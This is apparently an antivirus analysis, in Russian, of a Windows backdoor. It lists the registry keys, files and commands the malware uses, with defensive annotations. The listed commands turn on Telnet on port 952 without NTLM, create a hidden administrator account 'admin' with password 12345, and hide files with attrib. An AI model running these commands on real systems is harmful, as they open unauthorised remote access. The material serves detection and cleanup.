Техническая информация
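- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
  (значение 'Start' = 2 соответствует автоматическому типу запуска: служба Telnet будет стартовать при каждой загрузке системы)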
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
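- <SYSTEM32>\tlntadmn.exe config port=952 sec=-NTLM
  (сервер Telnet переносится со стандартного порта 23 на порт 952, а аутентификация NTLM отключается; Telnet передаёт учётные данные в открытом виде, поэтому входящие соединения на TCP-порт 952 — признак для сетевого мониторинга)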
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\wscript.exe "%WINDIR%\WMNetMgr.vbs"
- <SYSTEM32>\ipconfig.exe /all
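- <SYSTEM32>\attrib.exe +a +s +h C:\infosystem.txt
- <SYSTEM32>\attrib.exe +a +s +h %WINDIR%\WMNetMgr.vbs
  (атрибуты «системный» и «скрытый» убирают оба файла из стандартного вида Проводника; при проверке системы нужно включить отображение скрытых и защищённых системных файлов)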
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /del
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\1e.bat" "
- <SYSTEM32>\chcp.com 1251
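- <SYSTEM32>\reg.exe ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v admin /t REG_DWORD /d 00000000 /f
  (параметр с именем учётной записи и значением 0 в разделе SpecialAccounts\UserList скрывает эту учётную запись с экрана приветствия Windows; наличие такого параметра стоит проверять при расследовании)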
- <SYSTEM32>\sc.exe config tlntsvr start= auto
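- <SYSTEM32>\net1.exe user admin 12345 /add
- <SYSTEM32>\net1.exe localgroup Администраторы admin /add
  (создаётся локальная учётная запись admin с паролем 12345 и добавляется в группу администраторов; название группы задано по-русски, поэтому команда, по-видимому, рассчитана на русскоязычную Windows. На затронутой системе эту учётную запись следует удалить, а службу Telnet — остановить и отключить)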
- C:\infosystem.txt
- %WINDIR%\WMNetMgr.vbs
- %TEMP%\1.tmp\1e.bat
- %WINDIR%\WMNetMgr.vbs
- %WINDIR%\WMNetMgr.vbs
- %TEMP%\1.tmp\1e.bat